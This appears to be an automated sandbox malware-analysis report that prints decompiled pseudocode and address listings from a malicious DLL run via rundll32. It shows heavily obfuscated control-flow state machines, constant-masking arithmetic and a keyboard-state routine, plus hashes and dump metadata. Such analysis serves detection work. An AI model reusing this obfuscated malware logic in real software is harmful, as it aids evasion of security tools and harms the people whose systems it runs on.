                                                                                                                    0x0034bf11
                                                                                                                    0x0034bf18
                                                                                                                    0x0034bf1c
                                                                                                                    0x0034bf20
                                                                                                                    0x0034bf27
                                                                                                                    0x0034bf2e
                                                                                                                    0x0034bf35
                                                                                                                    0x0034bf3c
                                                                                                                    0x0034bf49
                                                                                                                    0x0034bf50
                                                                                                                    0x0034bf5b
                                                                                                                    0x0034bf5c
                                                                                                                    0x0034bf5f
                                                                                                                    0x0034bf66
                                                                                                                    0x0034bf6d
                                                                                                                    0x0034bf74
                                                                                                                    0x0034bf80
                                                                                                                    0x0034bf86
                                                                                                                    0x0034bf89
                                                                                                                    0x0034bf90
                                                                                                                    0x0034bf97
                                                                                                                    0x0034bf9e
                                                                                                                    0x0034bfa1
                                                                                                                    0x0034bfa8
                                                                                                                    0x0034bfb9
                                                                                                                    0x0034bfb9
                                                                                                                    0x0034bfbd
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0034bfb3
                                                                                                                    0x0034bfc1
                                                                                                                    0x0034bfb5
                                                                                                                    0x0034bfb5
                                                                                                                    0x0034bfb7
                                                                                                                    0x0034bfb8
                                                                                                                    0x00000000
                                                                                                                    0x0034bfb8
                                                                                                                    0x0034bfc4
                                                                                                                    0x0034bfd9
                                                                                                                    0x0034bfdf
                                                                                                                    0x0034bffd
                                                                                                                    0x0034c00c
                                                                                                                    0x0034c011
                                                                                                                    0x0034c019
                                                                                                                    0x0034c01a
                                                                                                                    0x0034c023
                                                                                                                    0x00000000
                                                                                                                    0x0034c029
                                                                                                                    0x0034bff0
                                                                                                                    0x0034bff5
                                                                                                                    0x0034bffb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0034c031
                                                                                                                    0x0034c031
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Gb$L-R$ThFT$iR6$H^
                                                                                                                    • API String ID: 0-1567385930
                                                                                                                    • Opcode ID: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                    • Instruction ID: 9b3f0498c053cd48f8fbbef732a85d26a2af725a0ec0cac0c9045b4615587346
                                                                                                                    • Opcode Fuzzy Hash: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                    • Instruction Fuzzy Hash: D5513371C05219EBDF49CFA4D94A8EEFBB1FF04314F208159D411BA260C3B52A59CF94
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1001B43F Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                    • GetKeyState.USER32(00000010), ref: 1001B463
                                                                                                                    • GetKeyState.USER32(00000011), ref: 1001B46C
                                                                                                                    • GetKeyState.USER32(00000012), ref: 1001B475
                                                                                                                    • SendMessageA.USER32 ref: 1001B48B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: State$LongMessageSendWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1063413437-0
                                                                                                                    • Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                    • Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
                                                                                                                    • Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                    • Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003420BA Relevance: 5.2, Strings: 4, Instructions: 240COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E003420BA() {
				char _v520;
				signed int _v524;
				unsigned int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _t227;
				intOrPtr _t228;
				signed int _t230;
				void* _t231;
				intOrPtr _t235;
				intOrPtr _t245;
				void* _t247;
				intOrPtr _t254;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t277;
				signed int* _t279;
				void* _t283;

				_t279 =  &_v624;
				_v612 = 0x15bebb;
				_v612 = _v612 ^ 0x0c09d82a;
				_t247 = 0x7e01d7;
				_v612 = _v612 + 0xffff69e9;
				_v612 = _v612 ^ 0xcffb1e8d;
				_v612 = _v612 ^ 0xc3e0ceeb;
				_v596 = 0xb5bc7f;
				_v596 = _v596 << 0xa;
				_v596 = _v596 + 0xbaa7;
				_v596 = _v596 ^ 0xd6f2b68e;
				_v600 = 0x5909af;
				_v600 = _v600 ^ 0x0096463d;
				_v600 = _v600 >> 3;
				_v600 = _v600 ^ 0x0016e9cd;
				_v548 = 0x801d18;
				_v548 = _v548 + 0xffffc800;
				_v548 = _v548 ^ 0x0070ca5a;
				_v580 = 0x2361dd;
				_v580 = _v580 * 0x6f;
				_t277 = 0;
				_v580 = _v580 << 0xe;
				_v580 = _v580 ^ 0xdbb34e1e;
				_v528 = 0x864281;
				_v528 = _v528 >> 0xc;
				_v528 = _v528 ^ 0x0000b217;
				_v560 = 0x478502;
				_v560 = _v560 | 0x3d47d1eb;
				_v560 = _v560 ^ 0x3d4c1a49;
				_v540 = 0x8f961f;
				_v540 = _v540 >> 0xc;
				_v540 = _v540 ^ 0x000d133d;
				_v572 = 0xef4b2;
				_v572 = _v572 << 0xd;
				_v572 = _v572 + 0xffff85b1;
				_v572 = _v572 ^ 0xde949f86;
				_v608 = 0x8e969a;
				_v608 = _v608 << 0xd;
				_t272 = 0x21;
				_v608 = _v608 / _t272;
				_t273 = 0x2f;
				_v608 = _v608 / _t273;
				_v608 = _v608 ^ 0x002a10b8;
				_v620 = 0x864bbd;
				_v620 = _v620 << 0x10;
				_v620 = _v620 + 0x87ba;
				_v620 = _v620 + 0x936f;
				_v620 = _v620 ^ 0x4bb78bcc;
				_v564 = 0xfb8a17;
				_t274 = 0x62;
				_v564 = _v564 * 0x63;
				_v564 = _v564 ^ 0x61429d97;
				_v576 = 0x222f;
				_v576 = _v576 >> 4;
				_v576 = _v576 ^ 0xf39884cf;
				_v576 = _v576 ^ 0xf39d4647;
				_v556 = 0x6068cb;
				_v556 = _v556 ^ 0xfe1a734d;
				_v556 = _v556 ^ 0xfe79d9b4;
				_v616 = 0xc46e23;
				_v616 = _v616 >> 2;
				_v616 = _v616 / _t274;
				_v616 = _v616 * 0x76;
				_v616 = _v616 ^ 0x003e2a5a;
				_v624 = 0x4617e4;
				_v624 = _v624 + 0xffff4d74;
				_v624 = _v624 ^ 0x9dcdfd87;
				_v624 = _v624 + 0x3fd8;
				_v624 = _v624 ^ 0x9d89a5c2;
				_v588 = 0x3a0167;
				_v588 = _v588 << 1;
				_v588 = _v588 + 0xffff1a51;
				_v588 = _v588 ^ 0x00728a40;
				_v532 = 0x3a363e;
				_v532 = _v532 ^ 0xe52a74a2;
				_v532 = _v532 ^ 0xe514694b;
				_v544 = 0x52d5cb;
				_v544 = _v544 | 0x185d0a08;
				_v544 = _v544 ^ 0x18524fe5;
				_v584 = 0x37b3aa;
				_v584 = _v584 + 0xebef;
				_t275 = 0x72;
				_v584 = _v584 * 0x28;
				_v584 = _v584 ^ 0x08d0b087;
				_v592 = 0xa4bebe;
				_v592 = _v592 >> 8;
				_v592 = _v592 | 0x739fbd45;
				_v592 = _v592 ^ 0x739593e3;
				_v552 = 0x17b1c;
				_v552 = _v552 << 0xe;
				_v552 = _v552 ^ 0x5ecd7403;
				_v568 = 0x403d75;
				_v568 = _v568 >> 3;
				_v568 = _v568 | 0x80b15bc0;
				_v568 = _v568 ^ 0x80b9a416;
				_v536 = 0x2ed64e;
				_t276 = _v524;
				_v536 = _v536 / _t275;
				_v536 = _v536 ^ 0x00033d67;
				_v604 = 0x8b403d;
				_v604 = _v604 + 0xffff3866;
				_v604 = _v604 << 8;
				_v604 = _v604 ^ 0x8a7a6cd3;
				goto L1;
				do {
					while(1) {
						L1:
						_t283 = _t247 - 0x73dad95;
						if(_t283 > 0) {
							break;
						}
						if(_t283 == 0) {
							E0034DA22(_v544, _v584, __eflags, _v592,  &_v520, _t247, _v552);
							_t235 = E00332051(_v536,  &_v520, _v604);
							_t254 =  *0x353e10; // 0x0
							 *((intOrPtr*)(_t254 + 0x10)) = _t235;
						} else {
							if(_t247 == 0x7e01d7) {
								_push(_t247);
								_push(_t247);
								 *0x353e10 = E00337FF2(0x45c);
								_t247 = 0x8643fcd;
								continue;
							} else {
								if(_t247 == 0xd34913) {
									_t247 = 0x148c4fa;
									_v524 = _v596;
									continue;
								} else {
									if(_t247 == 0xfeb697) {
										_v524 = _v612;
										goto L8;
									} else {
										if(_t247 != 0x148c4fa) {
											goto L20;
										} else {
											E00348F9E(_v620, _v564, _v576, _v556, _t276);
											_t279 =  &(_t279[3]);
											L8:
											_t247 = 0xac90332;
											continue;
										}
									}
								}
							}
						}
						L23:
						return _t277;
					}
					__eflags = _t247 - 0x8643fcd;
					if(_t247 == 0x8643fcd) {
						_t227 = E0033912C(_v600, _v560, _t247, _v540, _t247, _v572, _v608);
						_t276 = _t227;
						_t279 =  &(_t279[5]);
						__eflags = _t227;
						if(__eflags == 0) {
							_t247 = 0xfeb697;
							goto L20;
						} else {
							_t245 =  *0x353e10; // 0x0
							 *((intOrPtr*)(_t245 + 0x450)) = 1;
							_t247 = 0xd34913;
							goto L1;
						}
					} else {
						__eflags = _t247 - 0xac90332;
						if(_t247 == 0xac90332) {
							_push(_v532);
							_push(_v524);
							_push(_v588);
							_t228 =  *0x353e10; // 0x0
							_push(_t228 + 0x23c);
							_t230 = E003446BB(_v616, _v624);
							_t279 = _t279 - 0xc + 0x1c;
							_t247 = 0xe2d9513;
							__eflags = _t230;
							_t231 = 1;
							_t277 =  ==  ? _t231 : _t277;
							goto L1;
						} else {
							__eflags = _t247 - 0xe2d9513;
							if(_t247 != 0xe2d9513) {
								goto L20;
							} else {
								E0033A55F();
								_t247 = 0x73dad95;
								goto L1;
							}
						}
					}
					goto L23;
					L20:
					__eflags = _t247 - 0x13a2d4a;
				} while (__eflags != 0);
				goto L23;
			}













































                                                                                                                    0x003420ba
                                                                                                                    0x003420c0
                                                                                                                    0x003420ca
                                                                                                                    0x003420d2
                                                                                                                    0x003420d7
                                                                                                                    0x003420df
                                                                                                                    0x003420e7
                                                                                                                    0x003420ef
                                                                                                                    0x003420f7
                                                                                                                    0x003420fc
                                                                                                                    0x00342104
                                                                                                                    0x0034210c
                                                                                                                    0x00342114
                                                                                                                    0x0034211c
                                                                                                                    0x00342121
                                                                                                                    0x00342129
                                                                                                                    0x00342131
                                                                                                                    0x00342139
                                                                                                                    0x00342141
                                                                                                                    0x00342152
                                                                                                                    0x00342156
                                                                                                                    0x00342158
                                                                                                                    0x0034215d
                                                                                                                    0x00342165
                                                                                                                    0x0034216d
                                                                                                                    0x00342172
                                                                                                                    0x0034217a
                                                                                                                    0x00342182
                                                                                                                    0x0034218a
                                                                                                                    0x00342192
                                                                                                                    0x0034219a
                                                                                                                    0x0034219f
                                                                                                                    0x003421a7
                                                                                                                    0x003421af
                                                                                                                    0x003421b4
                                                                                                                    0x003421bc
                                                                                                                    0x003421c4
                                                                                                                    0x003421cc
                                                                                                                    0x003421d7
                                                                                                                    0x003421dc
                                                                                                                    0x003421e6
                                                                                                                    0x003421eb
                                                                                                                    0x003421f1
                                                                                                                    0x003421f9
                                                                                                                    0x00342201
                                                                                                                    0x00342206
                                                                                                                    0x0034220e
                                                                                                                    0x00342216
                                                                                                                    0x0034221e
                                                                                                                    0x0034222b
                                                                                                                    0x0034222c
                                                                                                                    0x00342230
                                                                                                                    0x00342238
                                                                                                                    0x00342240
                                                                                                                    0x00342245
                                                                                                                    0x0034224d
                                                                                                                    0x00342255
                                                                                                                    0x0034225d
                                                                                                                    0x00342265
                                                                                                                    0x0034226d
                                                                                                                    0x00342275
                                                                                                                    0x00342280
                                                                                                                    0x00342289
                                                                                                                    0x0034228d
                                                                                                                    0x00342297
                                                                                                                    0x003422a4
                                                                                                                    0x003422b1
                                                                                                                    0x003422b9
                                                                                                                    0x003422c1
                                                                                                                    0x003422c9
                                                                                                                    0x003422d1
                                                                                                                    0x003422d5
                                                                                                                    0x003422dd
                                                                                                                    0x003422e5
                                                                                                                    0x003422ed
                                                                                                                    0x003422f5
                                                                                                                    0x003422fd
                                                                                                                    0x00342305
                                                                                                                    0x0034230d
                                                                                                                    0x00342315
                                                                                                                    0x0034231d
                                                                                                                    0x0034232c
                                                                                                                    0x0034232d
                                                                                                                    0x00342331
                                                                                                                    0x00342339
                                                                                                                    0x00342341
                                                                                                                    0x00342346
                                                                                                                    0x0034234e
                                                                                                                    0x00342356
                                                                                                                    0x0034235e
                                                                                                                    0x00342363
                                                                                                                    0x0034236b
                                                                                                                    0x00342373
                                                                                                                    0x00342378
                                                                                                                    0x00342380
                                                                                                                    0x00342388
                                                                                                                    0x00342396
                                                                                                                    0x0034239a
                                                                                                                    0x0034239e
                                                                                                                    0x003423a6
                                                                                                                    0x003423ae
                                                                                                                    0x003423b6
                                                                                                                    0x003423bb
                                                                                                                    0x003423bb
                                                                                                                    0x003423c3
                                                                                                                    0x003423c3
                                                                                                                    0x003423c3
                                                                                                                    0x003423c3
                                                                                                                    0x003423c5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003423cb
                                                                                                                    0x00342519
                                                                                                                    0x00342532
                                                                                                                    0x00342537
                                                                                                                    0x00342540
                                                                                                                    0x003423d1
                                                                                                                    0x003423d7
                                                                                                                    0x0034243c
                                                                                                                    0x0034243d
                                                                                                                    0x00342445
                                                                                                                    0x0034244a
                                                                                                                    0x00000000
                                                                                                                    0x003423d9
                                                                                                                    0x003423df
                                                                                                                    0x00342420
                                                                                                                    0x00342425
                                                                                                                    0x00000000
                                                                                                                    0x003423e1
                                                                                                                    0x003423e7
                                                                                                                    0x00342416
                                                                                                                    0x00000000
                                                                                                                    0x003423e9
                                                                                                                    0x003423ef
                                                                                                                    0x00000000
                                                                                                                    0x003423f5
                                                                                                                    0x00342406
                                                                                                                    0x0034240b
                                                                                                                    0x0034240e
                                                                                                                    0x0034240e
                                                                                                                    0x00000000
                                                                                                                    0x0034240e
                                                                                                                    0x003423ef
                                                                                                                    0x003423e7
                                                                                                                    0x003423df
                                                                                                                    0x003423d7
                                                                                                                    0x00342544
                                                                                                                    0x0034254f
                                                                                                                    0x0034254f
                                                                                                                    0x00342454
                                                                                                                    0x0034245a
                                                                                                                    0x003424ca
                                                                                                                    0x003424cf
                                                                                                                    0x003424d1
                                                                                                                    0x003424d4
                                                                                                                    0x003424d6
                                                                                                                    0x003424f0
                                                                                                                    0x00000000
                                                                                                                    0x003424d8
                                                                                                                    0x003424d8
                                                                                                                    0x003424e0
                                                                                                                    0x003424e6
                                                                                                                    0x00000000
                                                                                                                    0x003424e6
                                                                                                                    0x0034245c
                                                                                                                    0x0034245c
                                                                                                                    0x0034245e
                                                                                                                    0x00342478
                                                                                                                    0x0034247c
                                                                                                                    0x00342480
                                                                                                                    0x00342484
                                                                                                                    0x00342499
                                                                                                                    0x0034249a
                                                                                                                    0x0034249f
                                                                                                                    0x003424a2
                                                                                                                    0x003424a7
                                                                                                                    0x003424ab
                                                                                                                    0x003424ac
                                                                                                                    0x00000000
                                                                                                                    0x00342460
                                                                                                                    0x00342460
                                                                                                                    0x00342466
                                                                                                                    0x00000000
                                                                                                                    0x0034246c
                                                                                                                    0x0034246c
                                                                                                                    0x00342471
                                                                                                                    0x00000000
                                                                                                                    0x00342471
                                                                                                                    0x00342466
                                                                                                                    0x0034245e
                                                                                                                    0x00000000
                                                                                                                    0x003424f5
                                                                                                                    0x003424f5
                                                                                                                    0x003424f5
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: /"$>6:$Z*>$u=@
                                                                                                                    • API String ID: 0-89199335
                                                                                                                    • Opcode ID: 1516b9e4940213b40ca1d5d59d1a78bd2dccdc1a20b0bc87960f9bb7b6a359ba
                                                                                                                    • Instruction ID: 2fb3a190a757e394101b324fa5f046b667a991c8f15d889260acce31ad1a9ecb
                                                                                                                    • Opcode Fuzzy Hash: 1516b9e4940213b40ca1d5d59d1a78bd2dccdc1a20b0bc87960f9bb7b6a359ba
                                                                                                                    • Instruction Fuzzy Hash: 18B101721083809FC369CF66C48A81BFBF1FBD4748F50991DF6A29A261D3B59949CF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003466CA Relevance: 5.2, Strings: 4, Instructions: 240COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E003466CA() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				void* _t263;
				void* _t264;
				intOrPtr _t265;
				void* _t268;
				void* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				intOrPtr _t282;
				intOrPtr _t289;
				intOrPtr _t306;
				void* _t310;
				signed int* _t314;

				_t314 =  &_v1164;
				_v1044 = _v1044 & 0x00000000;
				_v1056 = 0xc409ba;
				_v1052 = 0xa85c92;
				_v1048 = 0x441ffc;
				_v1160 = 0xafc02f;
				_v1160 = _v1160 + 0xffff4fb0;
				_v1160 = _v1160 + 0x85f3;
				_t272 = 0x2a;
				_v1160 = _v1160 / _t272;
				_v1160 = _v1160 ^ 0x000b1184;
				_t310 = 0xb516bbb;
				_v1060 = 0xeb49a4;
				_v1060 = _v1060 >> 5;
				_v1060 = _v1060 ^ 0x00095d90;
				_v1136 = 0x74fb0a;
				_t273 = 0x7f;
				_v1136 = _v1136 * 0x1e;
				_v1136 = _v1136 ^ 0x978de9ec;
				_v1136 = _v1136 ^ 0xad10b4f2;
				_v1136 = _v1136 ^ 0x372b3a8e;
				_v1152 = 0xb92c6e;
				_v1152 = _v1152 ^ 0x0e0e3092;
				_v1152 = _v1152 | 0x72fa6aba;
				_v1152 = _v1152 + 0xffff103c;
				_v1152 = _v1152 ^ 0x7efa5fdf;
				_v1128 = 0x794cf8;
				_v1128 = _v1128 ^ 0x9a366bfc;
				_v1128 = _v1128 + 0xde36;
				_v1128 = _v1128 ^ 0x5c71c30d;
				_v1128 = _v1128 ^ 0xc6263e62;
				_v1156 = 0x79c02;
				_v1156 = _v1156 + 0xfffffb46;
				_v1156 = _v1156 | 0x060cf66c;
				_v1156 = _v1156 ^ 0x799dfdb7;
				_v1156 = _v1156 ^ 0x7f9bfbef;
				_v1164 = 0xbfcf15;
				_v1164 = _v1164 >> 3;
				_v1164 = _v1164 << 0xc;
				_v1164 = _v1164 << 3;
				_v1164 = _v1164 ^ 0xfcf89fe4;
				_v1112 = 0xe0c8d1;
				_v1112 = _v1112 ^ 0xbad245c5;
				_v1112 = _v1112 << 5;
				_v1112 = _v1112 ^ 0x4653cc84;
				_v1116 = 0x38a8e4;
				_v1116 = _v1116 + 0xffff2cc2;
				_v1116 = _v1116 + 0x453c;
				_v1116 = _v1116 ^ 0x0030e111;
				_v1144 = 0x8706d;
				_v1144 = _v1144 | 0x44a168a8;
				_v1144 = _v1144 * 0x4d;
				_v1144 = _v1144 >> 0x10;
				_v1144 = _v1144 ^ 0x0002b082;
				_v1068 = 0x3ad283;
				_v1068 = _v1068 + 0xc4d8;
				_v1068 = _v1068 ^ 0x003ad5e6;
				_v1148 = 0xbbdd96;
				_v1148 = _v1148 / _t273;
				_v1148 = _v1148 + 0xffff10a8;
				_v1148 = _v1148 + 0xdbb9;
				_v1148 = _v1148 ^ 0x00089235;
				_v1084 = 0xf8cace;
				_v1084 = _v1084 ^ 0x230d76f6;
				_v1084 = _v1084 ^ 0x23f29212;
				_v1140 = 0x18cea;
				_v1140 = _v1140 << 3;
				_v1140 = _v1140 << 0xa;
				_v1140 = _v1140 + 0xffff66c6;
				_v1140 = _v1140 ^ 0x3196ba0a;
				_v1104 = 0x64ea4d;
				_v1104 = _v1104 >> 0xe;
				_v1104 = _v1104 << 0x10;
				_v1104 = _v1104 ^ 0x01951052;
				_v1120 = 0x40e961;
				_v1120 = _v1120 ^ 0xb7fb83c2;
				_v1120 = _v1120 + 0xb75e;
				_v1120 = _v1120 ^ 0xb7bbc099;
				_v1096 = 0x7779e0;
				_v1096 = _v1096 | 0x86983bb4;
				_v1096 = _v1096 ^ 0x86f0c1f2;
				_v1100 = 0xda5543;
				_v1100 = _v1100 + 0xffff2368;
				_v1100 = _v1100 + 0xffff6302;
				_v1100 = _v1100 ^ 0x00d61d50;
				_v1132 = 0x843ae5;
				_v1132 = _v1132 + 0xae05;
				_v1132 = _v1132 >> 9;
				_v1132 = _v1132 | 0xb52a1de5;
				_v1132 = _v1132 ^ 0xb5269cc0;
				_v1064 = 0x4bdca1;
				_t274 = 0x36;
				_v1064 = _v1064 * 0x2d;
				_v1064 = _v1064 ^ 0x0d50802d;
				_v1076 = 0xc70263;
				_v1076 = _v1076 ^ 0xed1c16c4;
				_v1076 = _v1076 ^ 0xeddf4f32;
				_v1108 = 0x3676a5;
				_v1108 = _v1108 << 0x10;
				_v1108 = _v1108 << 8;
				_v1108 = _v1108 ^ 0xa501f64e;
				_v1088 = 0x1a5bc1;
				_v1088 = _v1088 / _t274;
				_v1088 = _v1088 ^ 0x00023ab9;
				_v1092 = 0xcce8ca;
				_v1092 = _v1092 + 0xffff41cd;
				_v1092 = _v1092 ^ 0x00c96fdb;
				_v1072 = 0x26dee9;
				_t275 = 0x31;
				_v1072 = _v1072 * 0x7c;
				_v1072 = _v1072 ^ 0x12da7d33;
				_v1124 = 0xc51f8;
				_v1124 = _v1124 * 0x7c;
				_v1124 = _v1124 | 0x22e20644;
				_v1124 = _v1124 + 0xffff053d;
				_v1124 = _v1124 ^ 0x27f3e63a;
				_v1080 = 0x33633f;
				_v1080 = _v1080 / _t275;
				_v1080 = _v1080 ^ 0x000716b7;
				E00345C73(_t275);
				do {
					while(_t310 != 0xc63ed) {
						if(_t310 == 0x5b9c87d) {
							_push(_v1104);
							_push(_v1140);
							_t263 = E0034DCF7(_v1084, 0x331060, __eflags);
							_t264 = E0034D25E(_v1120);
							_t282 =  *0x353e10; // 0x0
							_t265 =  *0x353e10; // 0x0
							E0034453F(_v1100, __eflags, _v1132, _t263, _v1064, _t265 + 0x23c, _t282 + 0x1c, _v1076, _v1108, _t264, _t282 + 0x1c);
							_t268 = E0033A8B0(_v1088, _t263, _v1092);
							_t314 =  &(_t314[0xa]);
							_t310 = 0xc63ed;
							continue;
						} else {
							if(_t310 == 0xb516bbb) {
								_t310 = 0xc84e726;
								continue;
							} else {
								_t319 = _t310 - 0xc84e726;
								if(_t310 == 0xc84e726) {
									_push(_v1128);
									_push(_v1152);
									_t269 = E0034DCF7(_v1136, 0x331000, _t319);
									_t289 =  *0x353e10; // 0x0
									_t306 =  *0x353e10; // 0x0
									E003347CE(_t306 + 0x23c, _v1156, _t289 + 0x1c, _v1164, _v1112, _t269, _t289 + 0x1c, _v1116, _v1144);
									_t268 = E0033A8B0(_v1068, _t269, _v1148);
									_t314 =  &(_t314[9]);
									_t310 = 0x5b9c87d;
									continue;
								}
							}
						}
						goto L9;
					}
					_push(_v1080);
					_push( &_v1040);
					_push(_v1124);
					E003513AD(_v1072,  &_v520, __eflags);
					_t314 =  &(_t314[3]);
					_t310 = 0xafb2886;
					L9:
					__eflags = _t310 - 0xafb2886;
				} while (__eflags != 0);
				return _t268;
			}


















































                                                                                                                    0x003466ca
                                                                                                                    0x003466d0
                                                                                                                    0x003466d7
                                                                                                                    0x003466df
                                                                                                                    0x003466e7
                                                                                                                    0x003466ef
                                                                                                                    0x003466f7
                                                                                                                    0x003466ff
                                                                                                                    0x00346711
                                                                                                                    0x00346716
                                                                                                                    0x0034671c
                                                                                                                    0x00346724
                                                                                                                    0x00346729
                                                                                                                    0x00346731
                                                                                                                    0x00346736
                                                                                                                    0x0034673e
                                                                                                                    0x0034674b
                                                                                                                    0x0034674c
                                                                                                                    0x00346750
                                                                                                                    0x00346758
                                                                                                                    0x00346760
                                                                                                                    0x00346768
                                                                                                                    0x00346770
                                                                                                                    0x00346778
                                                                                                                    0x00346780
                                                                                                                    0x00346788
                                                                                                                    0x00346790
                                                                                                                    0x00346798
                                                                                                                    0x003467a0
                                                                                                                    0x003467a8
                                                                                                                    0x003467b0
                                                                                                                    0x003467b8
                                                                                                                    0x003467c0
                                                                                                                    0x003467c8
                                                                                                                    0x003467d0
                                                                                                                    0x003467d8
                                                                                                                    0x003467e0
                                                                                                                    0x003467e8
                                                                                                                    0x003467ed
                                                                                                                    0x003467f2
                                                                                                                    0x003467f7
                                                                                                                    0x003467ff
                                                                                                                    0x00346807
                                                                                                                    0x0034680f
                                                                                                                    0x00346814
                                                                                                                    0x0034681c
                                                                                                                    0x00346824
                                                                                                                    0x0034682c
                                                                                                                    0x00346834
                                                                                                                    0x0034683c
                                                                                                                    0x00346844
                                                                                                                    0x00346851
                                                                                                                    0x00346855
                                                                                                                    0x0034685a
                                                                                                                    0x00346862
                                                                                                                    0x0034686a
                                                                                                                    0x00346872
                                                                                                                    0x0034687a
                                                                                                                    0x00346888
                                                                                                                    0x0034688c
                                                                                                                    0x00346894
                                                                                                                    0x0034689c
                                                                                                                    0x003468a4
                                                                                                                    0x003468ac
                                                                                                                    0x003468b4
                                                                                                                    0x003468bc
                                                                                                                    0x003468c4
                                                                                                                    0x003468c9
                                                                                                                    0x003468ce
                                                                                                                    0x003468d8
                                                                                                                    0x003468e0
                                                                                                                    0x003468e8
                                                                                                                    0x003468ed
                                                                                                                    0x003468f2
                                                                                                                    0x003468fa
                                                                                                                    0x00346902
                                                                                                                    0x0034690a
                                                                                                                    0x00346912
                                                                                                                    0x0034691a
                                                                                                                    0x00346922
                                                                                                                    0x0034692a
                                                                                                                    0x00346932
                                                                                                                    0x0034693a
                                                                                                                    0x00346942
                                                                                                                    0x0034694a
                                                                                                                    0x00346952
                                                                                                                    0x0034695a
                                                                                                                    0x00346962
                                                                                                                    0x00346967
                                                                                                                    0x0034696f
                                                                                                                    0x00346977
                                                                                                                    0x00346986
                                                                                                                    0x00346989
                                                                                                                    0x0034698d
                                                                                                                    0x00346995
                                                                                                                    0x0034699d
                                                                                                                    0x003469a5
                                                                                                                    0x003469ad
                                                                                                                    0x003469b5
                                                                                                                    0x003469ba
                                                                                                                    0x003469bf
                                                                                                                    0x003469c7
